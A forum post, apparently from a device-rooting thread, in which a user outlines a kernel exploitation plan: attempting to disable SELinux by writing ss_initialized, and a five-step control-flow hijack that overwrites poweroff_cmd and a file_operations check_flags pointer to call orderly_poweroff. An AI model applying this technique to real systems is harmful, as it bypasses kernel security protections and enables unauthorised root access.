@chompie1337 Reading an uint from ss_initialized gave 136077328 and writing to this address gives an error (kallsyms says this is read only) Reading an ulong from ss_initialized gives something that looks like an address pointer which points to a 1 (uint) but this address is not writable either.
I looked at the source and ss_initialized (it works like it should BTW, goes to allow if it is 0) is defined with:
Code:
int *ss_initialized __ro_after_init;
So I guess it wouldn't work unless we can somehow safely disable CPU page write protection or trick the kernel into mapping this as writable.
Also as to the poweroff_cmd, if I understood it right the steps goes like this:
1) Overwrite poweroff_cmd string with our file address.
2) Create a file and get an address to the file struct with fdget.
3) Get file_operations struct address by reading the file struct address added to the correct offset.
4) Get the offset to check_flags pointer and overwrite with orderly_poweroff pointer.
5) Call fcntl with F_SETFL.
Does this look right? (I'm not sure how to get the offsets, I'm thinking about manually counting but not sure because there is some union{} before file_operations, so please tell if they could be looked up dynamically) Also is there any way to verify if it worked or not?
Thank you very much for helping!